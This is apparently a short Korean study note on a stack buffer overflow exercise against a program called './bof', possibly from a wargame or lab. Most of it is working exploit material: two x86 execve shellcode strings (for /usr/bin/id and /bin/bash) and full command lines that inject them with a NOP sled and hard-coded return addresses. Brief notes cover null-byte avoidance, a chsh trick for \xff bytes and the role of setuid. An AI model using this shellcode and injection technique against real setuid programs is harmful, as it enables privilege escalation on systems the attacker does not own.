\x31\xc0\x50\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80

./bof $(printf "\x31\xc0\x50\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")$(for x in `seq 1 64`; do printf "\x90"; done)$(printf "\xb4\xfa\xff\xbf")

* stack 내의 ret저장소의 주소는 원본을 기준으로 16byte씩 차이가 난다.

* \x00우회 기법: 레지스터를 xor로 초기화한 후 그 값을 넣어준다.

* \xff우회 기법: 쉘을 /bin/bash에서 /bin/bash2로 chsh -s /bin/bash2를 통해 바꿔 준 후, 로그아웃을 한 후 다시 접속 해야한다.

* chsh 명령어는 /etc/passwd파일을 조작한다.

* setuid, setgid 중요.

\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80

./bof $(printf "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")$(for x in `seq 1 64`; do printf "\x90"; done)$(printf "\xf4\xf9\xff\xbf")